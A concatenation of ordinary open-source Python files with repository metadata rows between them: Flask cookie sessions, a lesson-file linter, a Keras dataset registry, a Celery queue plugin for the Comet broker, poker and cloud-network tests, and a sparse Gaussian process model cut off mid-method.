JSON derived serializer with support for some extra Python types #: such as datetime objects or tuples. serializer = session_json_serializer session_class = SecureCookieSession def get_signing_serializer(self, app): if not app.secret_key: return None signer_kwargs = dict( key_derivation=self.key_derivation, digest_method=self.digest_method ) return URLSafeTimedSerializer( app.secret_key, salt=self.salt, serializer=self.serializer, signer_kwargs=signer_kwargs, ) def open_session(self, app, request): s = self.get_signing_serializer(app) if s is None: return None val = request.cookies.get(self.get_cookie_name(app)) if not val: return self.session_class() max_age = int(app.permanent_session_lifetime.total_seconds()) try: data = s.loads(val, max_age=max_age) return self.session_class(data) except BadSignature: return self.session_class() def save_session(self, app, session, response): name = self.get_cookie_name(app) domain = self.get_cookie_domain(app) path = self.get_cookie_path(app) secure = self.get_cookie_secure(app) samesite = self.get_cookie_samesite(app) # If the session is modified to be empty, remove the cookie. # If the session is empty, return without setting the cookie. if not session: if session.modified: response.delete_cookie( name, domain=domain, path=path, secure=secure, samesite=samesite ) return # Add a "Vary: Cookie" header if the session was accessed at all. if session.accessed: response.vary.add("Cookie") if not self.should_set_cookie(app, session): return httponly = self.get_cookie_httponly(app) expires = self.get_expiration_time(app, session) val = self.get_signing_serializer(app).dumps(dict(session)) response.set_cookie( name, val, expires=expires, httponly=httponly, domain=domain, path=path, secure=secure, samesite=samesite, )
36.984456
84
0.650743
795a9247526bfca92fa858910a15da39810d2e98
18,706
py
Python
bin/lesson_check.py
shandongfx/NIMBioSENM
1c39779791d9570b89ebf5b1d7f96ce682e16b26
[ "CC-BY-4.0" ]
2
2019-09-27T10:36:40.000Z
2021-02-25T19:24:19.000Z
bin/lesson_check.py
shandongfx/NIMBioSENM
1c39779791d9570b89ebf5b1d7f96ce682e16b26
[ "CC-BY-4.0" ]
null
null
null
bin/lesson_check.py
shandongfx/NIMBioSENM
1c39779791d9570b89ebf5b1d7f96ce682e16b26
[ "CC-BY-4.0" ]
2
2020-07-19T14:18:10.000Z
2020-11-24T00:47:53.000Z
#!/usr/bin/env python3 """ Check lesson files and their contents. """ import os import glob import re from argparse import ArgumentParser from util import (Reporter, read_markdown, load_yaml, check_unwanted_files, require) __version__ = '0.3' # Where to look for source Markdown files. SOURCE_DIRS = ['', '_episodes', '_extras'] # Where to look for source Rmd files. SOURCE_RMD_DIRS = ['_episodes_rmd'] # Required files: each entry is ('path': YAML_required). # FIXME: We do not yet validate whether any files have the required # YAML headers, but should in the future. # The '%' is replaced with the source directory path for checking. # Episodes are handled specially, and extra files in '_extras' are also handled # specially. This list must include all the Markdown files listed in the # 'bin/initialize' script. REQUIRED_FILES = { '%/CODE_OF_CONDUCT.md': False, '%/CONTRIBUTING.md': False, '%/LICENSE.md': False, '%/README.md': False, '%/_extras/discuss.md': False, '%/_extras/guide.md': False, '%/index.md': True, '%/reference.md': False, '%/setup.md': False, } # Episode filename pattern. P_EPISODE_FILENAME = re.compile(r'/_episodes/(\d\d)-[-\w]+.md$') # Pattern to match lines ending with whitespace. P_TRAILING_WHITESPACE = re.compile(r'\s+$') # Pattern to match figure references in HTML. P_FIGURE_REFS = re.compile(r'<img[^>]+src="([^"]+)"[^>]*>') # Pattern to match internally-defined Markdown links. P_INTERNAL_LINK_REF = re.compile(r'\[([^\]]+)\]\[([^\]]+)\]') # Pattern to match reference links (to resolve internally-defined references). P_INTERNAL_LINK_DEF = re.compile(r'^\[([^\]]+)\]:\s*(.+)') # What kinds of blockquotes are allowed? KNOWN_BLOCKQUOTES = { 'callout', 'challenge', 'checklist', 'discussion', 'keypoints', 'objectives', 'prereq', 'quotation', 'solution', 'testimonial' } # What kinds of code fragments are allowed? KNOWN_CODEBLOCKS = { 'error', 'output', 'source', 'language-bash', 'html', 'language-make', 'language-matlab', 'language-python', 'language-r', 'language-shell', 'language-sql' } # What fields are required in teaching episode metadata? TEACHING_METADATA_FIELDS = { ('title', str), ('teaching', int), ('exercises', int), ('questions', list), ('objectives', list), ('keypoints', list) } # What fields are required in break episode metadata? BREAK_METADATA_FIELDS = { ('layout', str), ('title', str), ('break', int) } # How long are lines allowed to be? # Please keep this in sync with .editorconfig! MAX_LINE_LEN = 100 def main(): """Main driver.""" args = parse_args() args.reporter = Reporter() check_config(args.reporter, args.source_dir) check_source_rmd(args.reporter, args.source_dir, args.parser) args.references = read_references(args.reporter, args.reference_path) docs = read_all_markdown(args.source_dir, args.parser) check_fileset(args.source_dir, args.reporter, list(docs.keys())) check_unwanted_files(args.source_dir, args.reporter) for filename in list(docs.keys()): checker = create_checker(args, filename, docs[filename]) checker.check() args.reporter.report() if args.reporter.messages and not args.permissive: exit(1) def parse_args(): """Parse command-line arguments.""" parser = ArgumentParser(description="""Check episode files in a lesson.""") parser.add_argument('-l', '--linelen', default=False, action="store_true", dest='line_lengths', help='Check line lengths') parser.add_argument('-p', '--parser', default=None, dest='parser', help='path to Markdown parser') parser.add_argument('-r', '--references', default=None, dest='reference_path', help='path to Markdown file of external references') parser.add_argument('-s', '--source', default=os.curdir, dest='source_dir', help='source directory') parser.add_argument('-w', '--whitespace', default=False, action="store_true", dest='trailing_whitespace', help='Check for trailing whitespace') parser.add_argument('--permissive', default=False, action="store_true", dest='permissive', help='Do not raise an error even if issues are detected') args, extras = parser.parse_known_args() require(args.parser is not None, 'Path to Markdown parser not provided') require(not extras, 'Unexpected trailing command-line arguments "{0}"'.format(extras)) return args def check_config(reporter, source_dir): """Check configuration file.""" config_file = os.path.join(source_dir, '_config.yml') config = load_yaml(config_file) reporter.check_field(config_file, 'configuration', config, 'kind', 'lesson') reporter.check_field(config_file, 'configuration', config, 'carpentry', ('swc', 'dc', 'lc', 'cp')) reporter.check_field(config_file, 'configuration', config, 'title') reporter.check_field(config_file, 'configuration', config, 'email') for defaults in [ {'values': {'root': '.', 'layout': 'page'}}, {'values': {'root': '..', 'layout': 'episode'}, 'scope': {'type': 'episodes', 'path': ''}}, {'values': {'root': '..', 'layout': 'page'}, 'scope': {'type': 'extras', 'path': ''}} ]: reporter.check(defaults in config.get('defaults', []), 'configuration', '"root" not set to "." in configuration') def check_source_rmd(reporter, source_dir, parser): """Check that Rmd episode files include `source: Rmd`""" episode_rmd_dir = [os.path.join(source_dir, d) for d in SOURCE_RMD_DIRS] episode_rmd_files = [os.path.join(d, '*.Rmd') for d in episode_rmd_dir] results = {} for pat in episode_rmd_files: for f in glob.glob(pat): data = read_markdown(parser, f) dy = data['metadata'] if dy: reporter.check_field(f, 'episode_rmd', dy, 'source', 'Rmd') def read_references(reporter, ref_path): """Read shared file of reference links, returning dictionary of valid references {symbolic_name : URL} """ result = {} urls_seen = set() if ref_path: with open(ref_path, 'r') as reader: for (num, line) in enumerate(reader): line_num = num + 1 m = P_INTERNAL_LINK_DEF.search(line) require(m, '{0}:{1} not valid reference:\n{2}'.format(ref_path, line_num, line.rstrip())) name = m.group(1) url = m.group(2) require(name, 'Empty reference at {0}:{1}'.format(ref_path, line_num)) reporter.check(name not in result, ref_path, 'Duplicate reference {0} at line {1}', name, line_num) reporter.check(url not in urls_seen, ref_path, 'Duplicate definition of URL {0} at line {1}', url, line_num) result[name] = url urls_seen.add(url) return result def read_all_markdown(source_dir, parser): """Read source files, returning {path : {'metadata':yaml, 'metadata_len':N, 'text':text, 'lines':[(i, line, len)], 'doc':doc}} """ all_dirs = [os.path.join(source_dir, d) for d in SOURCE_DIRS] all_patterns = [os.path.join(d, '*.md') for d in all_dirs] result = {} for pat in all_patterns: for filename in glob.glob(pat): data = read_markdown(parser, filename) if data: result[filename] = data return result def check_fileset(source_dir, reporter, filenames_present): """Are all required files present? Are extraneous files present?""" # Check files with predictable names. required = [p.replace('%', source_dir) for p in REQUIRED_FILES] missing = set(required) - set(filenames_present) for m in missing: reporter.add(None, 'Missing required file {0}', m) # Check episode files' names. seen = [] for filename in filenames_present: if '_episodes' not in filename: continue m = P_EPISODE_FILENAME.search(filename) if m and m.group(1): seen.append(m.group(1)) else: reporter.add( None, 'Episode {0} has badly-formatted filename', filename) # Check for duplicate episode numbers. reporter.check(len(seen) == len(set(seen)), None, 'Duplicate episode numbers {0} vs {1}', sorted(seen), sorted(set(seen))) # Check that numbers are consecutive. seen = sorted([int(s) for s in seen]) clean = True for i in range(len(seen) - 1): clean = clean and ((seen[i+1] - seen[i]) == 1) reporter.check(clean, None, 'Missing or non-consecutive episode numbers {0}', seen) def create_checker(args, filename, info): """Create appropriate checker for file.""" for (pat, cls) in CHECKERS: if pat.search(filename): return cls(args, filename, **info) return NotImplemented class CheckBase: """Base class for checking Markdown files.""" def __init__(self, args, filename, metadata, metadata_len, text, lines, doc): """Cache arguments for checking.""" self.args = args self.reporter = self.args.reporter # for convenience self.filename = filename self.metadata = metadata self.metadata_len = metadata_len self.text = text self.lines = lines self.doc = doc self.layout = None def check(self): """Run tests.""" self.check_metadata() self.check_line_lengths() self.check_trailing_whitespace() self.check_blockquote_classes() self.check_codeblock_classes() self.check_defined_link_references() def check_metadata(self): """Check the YAML metadata.""" self.reporter.check(self.metadata is not None, self.filename, 'Missing metadata entirely') if self.metadata and (self.layout is not None): self.reporter.check_field( self.filename, 'metadata', self.metadata, 'layout', self.layout) def check_line_lengths(self): """Check the raw text of the lesson body.""" if self.args.line_lengths: over = [i for (i, l, n) in self.lines if ( n > MAX_LINE_LEN) and (not l.startswith('!'))] self.reporter.check(not over, self.filename, 'Line(s) are too long: {0}', ', '.join([str(i) for i in over])) def check_trailing_whitespace(self): """Check for whitespace at the ends of lines.""" if self.args.trailing_whitespace: trailing = [ i for (i, l, n) in self.lines if P_TRAILING_WHITESPACE.match(l)] self.reporter.check(not trailing, self.filename, 'Line(s) end with whitespace: {0}', ', '.join([str(i) for i in trailing])) def check_blockquote_classes(self): """Check that all blockquotes have known classes.""" for node in self.find_all(self.doc, {'type': 'blockquote'}): cls = self.get_val(node, 'attr', 'class') self.reporter.check(cls in KNOWN_BLOCKQUOTES, (self.filename, self.get_loc(node)), 'Unknown or missing blockquote type {0}', cls) def check_codeblock_classes(self): """Check that all code blocks have known classes.""" for node in self.find_all(self.doc, {'type': 'codeblock'}): cls = self.get_val(node, 'attr', 'class') self.reporter.check(cls in KNOWN_CODEBLOCKS, (self.filename, self.get_loc(node)), 'Unknown or missing code block type {0}', cls) def check_defined_link_references(self): """Check that defined links resolve in the file. Internally-defined links match the pattern [text][label]. """ result = set() for node in self.find_all(self.doc, {'type': 'text'}): for match in P_INTERNAL_LINK_REF.findall(node['value']): text = match[0] link = match[1] if link not in self.args.references: result.add('"{0}"=>"{1}"'.format(text, link)) self.reporter.check(not result, self.filename, 'Internally-defined links may be missing definitions: {0}', ', '.join(sorted(result))) def find_all(self, node, pattern, accum=None): """Find all matches for a pattern.""" assert isinstance(pattern, dict), 'Patterns must be dictionaries' if accum is None: accum = [] if self.match(node, pattern): accum.append(node) for child in node.get('children', []): self.find_all(child, pattern, accum) return accum def match(self, node, pattern): """Does this node match the given pattern?""" for key in pattern: if key not in node: return False val = pattern[key] if isinstance(val, str): if node[key] != val: return False elif isinstance(val, dict): if not self.match(node[key], val): return False return True @staticmethod def get_val(node, *chain): """Get value one or more levels down.""" curr = node for selector in chain: curr = curr.get(selector, None) if curr is None: break return curr def get_loc(self, node): """Convenience method to get node's line number.""" result = self.get_val(node, 'options', 'location') if self.metadata_len is not None: result += self.metadata_len return result class CheckNonJekyll(CheckBase): """Check a file that isn't translated by Jekyll.""" def check_metadata(self): self.reporter.check(self.metadata is None, self.filename, 'Unexpected metadata') class CheckIndex(CheckBase): """Check the main index page.""" def __init__(self, args, filename, metadata, metadata_len, text, lines, doc): super().__init__(args, filename, metadata, metadata_len, text, lines, doc) self.layout = 'lesson' def check_metadata(self): super().check_metadata() self.reporter.check(self.metadata.get('root', '') == '.', self.filename, 'Root not set to "."') class CheckEpisode(CheckBase): """Check an episode page.""" def check(self): """Run extra tests.""" super().check() self.check_reference_inclusion() def check_metadata(self): super().check_metadata() if self.metadata: if 'layout' in self.metadata: if self.metadata['layout'] == 'break': self.check_metadata_fields(BREAK_METADATA_FIELDS) else: self.reporter.add(self.filename, 'Unknown episode layout "{0}"', self.metadata['layout']) else: self.check_metadata_fields(TEACHING_METADATA_FIELDS) def check_metadata_fields(self, expected): """Check metadata fields.""" for (name, type_) in expected: if name not in self.metadata: self.reporter.add(self.filename, 'Missing metadata field {0}', name) elif not isinstance(self.metadata[name], type_): self.reporter.add(self.filename, '"{0}" has wrong type in metadata ({1} instead of {2})', name, type(self.metadata[name]), type_) def check_reference_inclusion(self): """Check that links file has been included.""" if not self.args.reference_path: return for (i, last_line, line_len) in reversed(self.lines): if last_line: break require(last_line, 'No non-empty lines in {0}'.format(self.filename)) include_filename = os.path.split(self.args.reference_path)[-1] if include_filename not in last_line: self.reporter.add(self.filename, 'episode does not include "{0}"', include_filename) class CheckReference(CheckBase): """Check the reference page.""" def __init__(self, args, filename, metadata, metadata_len, text, lines, doc): super().__init__(args, filename, metadata, metadata_len, text, lines, doc) self.layout = 'reference' class CheckGeneric(CheckBase): """Check a generic page.""" def __init__(self, args, filename, metadata, metadata_len, text, lines, doc): super().__init__(args, filename, metadata, metadata_len, text, lines, doc) CHECKERS = [ (re.compile(r'CONTRIBUTING\.md'), CheckNonJekyll), (re.compile(r'README\.md'), CheckNonJekyll), (re.compile(r'index\.md'), CheckIndex), (re.compile(r'reference\.md'), CheckReference), (re.compile(r'_episodes/.*\.md'), CheckEpisode), (re.compile(r'aio\.md'), CheckNonJekyll), (re.compile(r'.*\.md'), CheckGeneric) ] if __name__ == '__main__': main()
34.07286
103
0.560355
795a934bd340a64090dbec5a2387a56d309adee2
2,761
py
Python
src/sparseml/keras/datasets/registry.py
clementpoiret/sparseml
8442a6ef8ba11fb02f5e51472dd68b72438539b9
[ "Apache-2.0" ]
922
2021-02-04T17:51:54.000Z
2022-03-31T20:49:26.000Z
src/sparseml/keras/datasets/registry.py
clementpoiret/sparseml
8442a6ef8ba11fb02f5e51472dd68b72438539b9
[ "Apache-2.0" ]
197
2021-02-04T22:17:21.000Z
2022-03-31T13:58:55.000Z
src/sparseml/keras/datasets/registry.py
clementpoiret/sparseml
8442a6ef8ba11fb02f5e51472dd68b72438539b9
[ "Apache-2.0" ]
80
2021-02-04T22:20:14.000Z
2022-03-30T19:36:15.000Z
# Copyright (c) 2021 - present / Neuralmagic, Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Code related to the Keras dataset registry for easily creating datasets. """ from typing import Any, Dict, List, Union __all__ = ["DatasetRegistry"] class DatasetRegistry(object): """ Registry class for creating datasets """ _CONSTRUCTORS = {} _ATTRIBUTES = {} @staticmethod def create(key: str, *args, **kwargs): """ Create a new dataset for the given key :param key: the dataset key (name) to create :return: the instantiated model """ if key not in DatasetRegistry._CONSTRUCTORS: raise ValueError( "key {} is not in the model registry; available: {}".format( key, DatasetRegistry._CONSTRUCTORS.keys() ) ) return DatasetRegistry._CONSTRUCTORS[key](*args, **kwargs) @staticmethod def attributes(key: str) -> Dict[str, Any]: """ :param key: the dataset key (name) to create :return: the specified attributes for the dataset """ if key not in DatasetRegistry._CONSTRUCTORS: raise ValueError( "key {} is not in the model registry; available: {}".format( key, DatasetRegistry._CONSTRUCTORS.keys() ) ) return DatasetRegistry._ATTRIBUTES[key] @staticmethod def register(key: Union[str, List[str]], attributes: Dict[str, Any]): """ Register a dataset with the registry. Should be used as a decorator :param key: the model key (name) to create :param attributes: the specified attributes for the dataset :return: the decorator """ if not isinstance(key, List): key = [key] def decorator(const_func): for r_key in key: if r_key in DatasetRegistry._CONSTRUCTORS: raise ValueError("key {} is already registered".format(key)) DatasetRegistry._CONSTRUCTORS[r_key] = const_func DatasetRegistry._ATTRIBUTES[r_key] = attributes return const_func return decorator
32.104651
80
0.624049
795a93929fb072cbdc0e711dbb1238260072c5de
1,104
py
Python
comet_plugin/comet/plugins/add_to_celery_queue.py
4pisky/fourpisky-core
1dc9c4f73dfef075e2a27c3c8453d811a5a99e58
[ "BSD-2-Clause" ]
2
2016-08-25T22:20:58.000Z
2018-11-18T21:16:11.000Z
comet_plugin/comet/plugins/add_to_celery_queue.py
4pisky/fourpisky-core
1dc9c4f73dfef075e2a27c3c8453d811a5a99e58
[ "BSD-2-Clause" ]
2
2016-11-01T14:10:58.000Z
2016-11-01T14:11:39.000Z
comet_plugin/comet/plugins/add_to_celery_queue.py
4pisky/fourpisky-core
1dc9c4f73dfef075e2a27c3c8453d811a5a99e58
[ "BSD-2-Clause" ]
null
null
null
# Defines a plugin for the Comet broker. # If top-level directory 'comet_plugin' is added to $PYTHONPATH then comet # will detect this module at import-time. import os from zope.interface import implementer from twisted.plugin import IPlugin from comet.icomet import IHandler, IHasOptions import comet.log as log from fourpisky.taskqueue.tasks import ( process_voevent_celerytask, ingest_voevent_celerytask ) @implementer(IPlugin, IHandler) class CeleryQueuer(object): name = "celery-queue" # When the handler is called, it is passed an instance of # comet.utility.xml.xml_document. def __call__(self, event): """ Add an event to the celery processing queue """ log.debug("Passing to celery...") try: process_voevent_celerytask.delay(event.raw_bytes) ingest_voevent_celerytask.delay(event.raw_bytes) except Exception as e: self.deferred.errback(e) log.debug("Celery jobs sent OK.") # This instance of the handler is what actually constitutes our plugin. queue_event = CeleryQueuer()
30.666667
74
0.711957
795a9393037a0b3328e5e3c9c210c3b8c9ac79af
1,354
py
Python
pokershell/tests/eval/test_context.py
fblaha/pokershell
36a3bfff6ead7fef175e430dfdb88ac6f6a31d1f
[ "Apache-2.0" ]
6
2016-05-13T07:39:37.000Z
2022-03-05T07:23:46.000Z
pokershell/tests/eval/test_context.py
fblaha/pokershell
36a3bfff6ead7fef175e430dfdb88ac6f6a31d1f
[ "Apache-2.0" ]
1
2017-12-18T09:08:28.000Z
2017-12-31T01:48:32.000Z
pokershell/tests/eval/test_context.py
fblaha/pokershell
36a3bfff6ead7fef175e430dfdb88ac6f6a31d1f
[ "Apache-2.0" ]
5
2016-10-11T23:54:35.000Z
2022-03-05T07:23:47.000Z
import unittest import pokershell.model as model import pokershell.tests.eval.common as common class TestEvalContext(unittest.TestCase, common.TestUtilsMixin): def setUp(self): super().setUp() self.ctx = self.create_context('2h 2c 2d 5h Jh Jc') def test_rank_dict(self): self.assertEqual(2, len(self.ctx.rank_dict[model.Rank.JACK])) self.assertEqual(3, len(self.ctx.rank_dict[model.Rank.DEUCE])) self.assertEqual(1, len(self.ctx.rank_dict[model.Rank.FIVE])) self.assertEqual(0, len(self.ctx.rank_dict[model.Rank.SEVEN])) def test_suit_dict(self): self.assertEqual(2, len(self.ctx.suit_dict[model.Suit.CLUBS])) self.assertEqual(3, len(self.ctx.suit_dict[model.Suit.HEARTS])) self.assertEqual(1, len(self.ctx.suit_dict[model.Suit.DIAMONDS])) def test_sorted_ranks(self): self.assertEqual([model.Rank.JACK, model.Rank.JACK, model.Rank.FIVE], self.ctx.sorted_ranks[:3]) def test_complement_ranks(self): self.assertEqual([model.Rank.DEUCE], self.ctx.get_complement_ranks( 1, model.Rank.JACK, model.Rank.FIVE)) self.assertEqual([model.Rank.JACK, model.Rank.JACK, model.Rank.DEUCE], self.ctx.get_complement_ranks(3, model.Rank.FIVE))
41.030303
78
0.655835
795a93c3e5229eb4e6f5a5c3186553eb0052991f
4,054
py
Python
integrationtest/vm/virtualrouter/eip/test_2_eips.py
sherry546/zstack-woodpecker
54a37459f2d72ce6820974feaa6eb55772c3d2ce
[ "Apache-2.0" ]
1
2021-03-21T12:41:11.000Z
2021-03-21T12:41:11.000Z
integrationtest/vm/virtualrouter/eip/test_2_eips.py
sherry546/zstack-woodpecker
54a37459f2d72ce6820974feaa6eb55772c3d2ce
[ "Apache-2.0" ]
null
null
null
integrationtest/vm/virtualrouter/eip/test_2_eips.py
sherry546/zstack-woodpecker
54a37459f2d72ce6820974feaa6eb55772c3d2ce
[ "Apache-2.0" ]
1
2017-05-19T06:40:40.000Z
2017-05-19T06:40:40.000Z
''' Test create 2 EIPs for 2 Vms in same L3 Network. So 2 VIPs will be setup in same VR , then check if 2 VM could use VIP to connect each other. Test step: 1. Create 2 VMs 2. Create a EIP with VM's nic each 3. Check the 2 EIPs connectibility 4. Destroy VMs @author: Youyk ''' import zstackwoodpecker.test_util as test_util import zstackwoodpecker.test_lib as test_lib import zstackwoodpecker.test_state as test_state import os test_stub = test_lib.lib_get_test_stub() test_obj_dict = test_state.TestStateDict() def test(): test_util.test_dsc('Create test vm with EIP and check.') vm1 = test_stub.create_vlan_vm(os.environ.get('l3VlanNetworkName1')) test_obj_dict.add_vm(vm1) vm2 = test_stub.create_vlan_vm(os.environ.get('l3VlanNetworkName1')) test_obj_dict.add_vm(vm2) l3_name = os.environ.get('l3VlanNetworkName1') vr1_l3_uuid = test_lib.lib_get_l3_by_name(l3_name).uuid vrs = test_lib.lib_find_vr_by_l3_uuid(vr1_l3_uuid) temp_vm1 = None if not vrs: #create temp_vm1 for getting vlan1's vr for test pf_vm portforwarding temp_vm1 = test_stub.create_vlan_vm() test_obj_dict.add_vm(temp_vm1) vr1 = test_lib.lib_find_vr_by_vm(temp_vm1.vm)[0] else: vr1 = vrs[0] if vr1.applianceVmType == "vrouter": test_util.test_skip("vrouter VR does not support single VM multiple EIP") l3_name = os.environ.get('l3NoVlanNetworkName1') vr2_l3_uuid = test_lib.lib_get_l3_by_name(l3_name).uuid vrs = test_lib.lib_find_vr_by_l3_uuid(vr2_l3_uuid) temp_vm2 = None if not vrs: #create temp_vm2 for getting novlan's vr for test pf_vm portforwarding temp_vm2 = test_stub.create_user_vlan_vm() test_obj_dict.add_vm(temp_vm2) vr2 = test_lib.lib_find_vr_by_vm(temp_vm2.vm)[0] else: vr2 = vrs[0] if vr1.applianceVmType == "vrouter": test_util.test_skip("vrouter VR does not support single VM multiple EIP") #we do not need temp_vm1 and temp_vm2, since we just use their VRs. if temp_vm1: temp_vm1.destroy() test_obj_dict.rm_vm(temp_vm1) if temp_vm2: temp_vm2.destroy() test_obj_dict.rm_vm(temp_vm2) vm_nic1 = vm1.vm.vmNics[0] vm_nic1_uuid = vm_nic1.uuid vm_nic2 = vm2.vm.vmNics[0] vm_nic2_uuid = vm_nic2.uuid pri_l3_uuid = vm_nic1.l3NetworkUuid vr = test_lib.lib_find_vr_by_l3_uuid(pri_l3_uuid)[0] vr_pub_nic = test_lib.lib_find_vr_pub_nic(vr) l3_uuid = vr_pub_nic.l3NetworkUuid vip1 = test_stub.create_vip('create_vip 1', l3_uuid) test_obj_dict.add_vip(vip1) eip1 = test_stub.create_eip('create eip 1', vip_uuid=vip1.get_vip().uuid, \ vnic_uuid=vm_nic1_uuid, vm_obj=vm1) vip1.attach_eip(eip1) vip2 = test_stub.create_vip('create_vip 2', l3_uuid) test_obj_dict.add_vip(vip2) eip2 = test_stub.create_eip('create eip 2', vip_uuid=vip2.get_vip().uuid, \ vnic_uuid=vm_nic2_uuid, vm_obj=vm2) vip2.attach_eip(eip2) vm1.check() vip1.check() vm2.check() vip2.check() test_lib.lib_check_ports_in_a_command(vm1.get_vm(), vip1.get_vip().ip, \ vip2.get_vip().ip, test_stub.target_ports, [], vm2.get_vm()) test_lib.lib_check_ports_in_a_command(vm2.get_vm(), vip2.get_vip().ip, \ vip1.get_vip().ip, test_stub.target_ports, [], vm1.get_vm()) vm1.destroy() test_obj_dict.rm_vm(vm1) test_lib.lib_check_ports_in_a_command(vm2.get_vm(), vip2.get_vip().ip, \ vip1.get_vip().ip, [], test_stub.target_ports, vm1.get_vm()) vm2.destroy() test_obj_dict.rm_vm(vm2) vip1.delete() test_obj_dict.rm_vip(vip1) vip2.delete() test_obj_dict.rm_vip(vip2) test_util.test_pass('Test 2 EIPs for 2 VMs Success') #Will be called only if exception happens in test(). def error_cleanup(): global test_obj_dict test_lib.lib_error_cleanup(test_obj_dict)
35.561404
84
0.681302
795a95e953e06912b18eb468361301249af57d5e
202
py
Python
text_to_speech.py
Atulbargotra/smart_driving
7356b468260c1f102528df702c412f3e9cbd74d5
[ "MIT" ]
4
2020-02-21T18:25:38.000Z
2021-11-14T20:23:15.000Z
text_to_speech.py
Atulbargotra/smart_driving
7356b468260c1f102528df702c412f3e9cbd74d5
[ "MIT" ]
3
2020-02-21T17:58:58.000Z
2020-02-21T17:58:59.000Z
text_to_speech.py
Atulbargotra/smart_driving
7356b468260c1f102528df702c412f3e9cbd74d5
[ "MIT" ]
4
2020-02-21T18:25:43.000Z
2021-01-13T10:04:20.000Z
from gtts import gTTS import playsound def speak(text_input,language='hi'): tts = gTTS(text=text_input, lang=language) tts.save("sounds/output.mp3") playsound.playsound('sounds/output.mp3')
28.857143
46
0.737624
795a969aa3575ade5de46b5eee98a0286e6e4d22
193
py
Python
01_Fernando/input_hub/log/logging.py
mlobf/new_pandas_course
ecf0ea529b22422a7e97719b89ba9037d0fb2be7
[ "BSD-3-Clause" ]
null
null
null
01_Fernando/input_hub/log/logging.py
mlobf/new_pandas_course
ecf0ea529b22422a7e97719b89ba9037d0fb2be7
[ "BSD-3-Clause" ]
null
null
null
01_Fernando/input_hub/log/logging.py
mlobf/new_pandas_course
ecf0ea529b22422a7e97719b89ba9037d0fb2be7
[ "BSD-3-Clause" ]
null
null
null
import logging logging.warning('This is a warnning') #basicConfig(filename='sample.log', level=logging.DEBUG) #logger = logging.getLogger() # Test logger #logger.info("Our fist message")
14.846154
56
0.740933
795a96a562ee75433ad08c3ab972d381cc06c540
6,781
py
Python
src/models/tsvgp_sites.py
AaltoML/t-SVGP
bfa6119ad071ca191d7a413e09b33811c18be533
[ "MIT" ]
4
2021-11-10T21:53:16.000Z
2021-11-11T08:39:11.000Z
src/models/tsvgp_sites.py
AaltoML/t-SVGP
bfa6119ad071ca191d7a413e09b33811c18be533
[ "MIT" ]
1
2021-11-07T18:56:49.000Z
2021-11-07T18:56:49.000Z
src/models/tsvgp_sites.py
AaltoML/t-SVGP
bfa6119ad071ca191d7a413e09b33811c18be533
[ "MIT" ]
null
null
null
""" Module for the t-SVGP models with individual sites per data point. """ from typing import Optional import numpy as np import tensorflow as tf from gpflow import default_jitter, kullback_leiblers from gpflow.conditionals import conditional from gpflow.covariances import Kuf, Kuu from gpflow.models import GPModel from gpflow.models.training_mixins import InputData, RegressionData from gpflow.models.util import inducingpoint_wrapper from gpflow.types import MeanAndVariance from src.sites import DiagSites from src.util import posterior_from_dense_site_white, project_diag_sites class t_SVGP_sites(GPModel): """ Class for the t-SVGP model with sites """ def __init__( self, data: RegressionData, kernel, likelihood, inducing_variable, *, mean_function=None, num_latent_gps: int = 1, lambda_1=None, lambda_2=None, num_latent: Optional[int] = 1 ): """ - kernel, likelihood, inducing_variables, mean_function are appropriate GPflow objects - num_latent_gps is the number of latent processes to use, defaults to 1 - q_diag is a boolean. If True, the covariance is approximated by a diagonal matrix. - whiten is a boolean. If True, we use the whitened representation of the inducing points. - num_data is the total number of observations, defaults to X.shape[0] (relevant when feeding in external minibatches) """ GPModel.__init__(self, kernel, likelihood, mean_function, num_latent_gps) x_data, y_data = data num_data = x_data.shape[0] self.num_data = num_data self.num_latent = num_latent or y_data.shape[1] self.data = data self.inducing_variable = inducingpoint_wrapper(inducing_variable) self.num_inducing = self.inducing_variable.num_inducing self._init_variational_parameters(self.num_data, lambda_1, lambda_2) self.whiten = False def _init_variational_parameters(self, num_inducing, lambda_1, lambda_2): """ Constructs the site parameters λ₁, Λ₂. for site t(u) = exp(uᵀλ₁ - ½ uᵀΛ₂u) Parameters ---------- :param num_inducing: int Number of inducing variables, typically referred to as M. :param lambda_1: np.array or None First order natural parameter of the variational site. :param lambda_2: np.array or None Second order natural parameter of the variational site. """ lambda_1 = np.zeros((num_inducing, self.num_latent_gps)) if lambda_1 is None else lambda_1 if lambda_2 is None: lambda_2 = ( np.ones((num_inducing, self.num_latent_gps)) * 1e-6 if lambda_2 is None else lambda_2 ) else: assert lambda_2.ndim == 2 self.num_latent_gps = lambda_2.shape[-1] self.sites = DiagSites(lambda_1, lambda_2) @property def lambda_1(self): """first natural parameter""" return self.sites.lambda_1 @property def lambda_2(self): """second natural parameter""" return self.sites.lambda_2 def get_mean_chol_cov_inducing_posterior(self): """ Computes the mean and cholesky factor of the posterior on the inducing variables q(u) = 𝓝(u; m, S) S = (K⁻¹ + Λ₂)⁻¹ = (K⁻¹ + L₂L₂ᵀ)⁻¹ = K - KL₂W⁻¹L₂ᵀK , W = (I + L₂ᵀKL₂)⁻¹ m = S λ₁ """ X, _ = self.data K_uu = Kuu( self.inducing_variable, self.kernel, jitter=default_jitter() ) # [P, M, M] or [M, M] K_uf = Kuf(self.inducing_variable, self.kernel, X) # [P, M, M] or [M, M] lambda_1, lambda_2 = project_diag_sites(K_uf, self.lambda_1, self.lambda_2, cholesky=False) return posterior_from_dense_site_white(K_uu, lambda_1, lambda_2) def natgrad_step(self, lr=0.1): """Takes natural gradient step in Variational parameters in the local parameters λₜ = rₜ▽[Var_exp] + (1-rₜ)λₜ₋₁ Input: :param: X : N x D :param: Y: N x 1 :param: lr: Scalar Output: Updates the params """ X, Y = self.data mean, var = self.predict_f(X) with tf.GradientTape() as g: g.watch([mean, var]) ve = self.likelihood.variational_expectations(mean, var, Y) grads = g.gradient(ve, [mean, var]) grads = grads[0] - 2.0 * grads[1] * mean, grads[1] # compute update in natural form lambda_2 = -0.5 * self.lambda_2 lambda_1 = self.lambda_1 lambda_1 = (1 - lr) * lambda_1 + lr * grads[0] lambda_2 = (1 - lr) * lambda_2 + lr * grads[1] eps = 1e-8 # crop 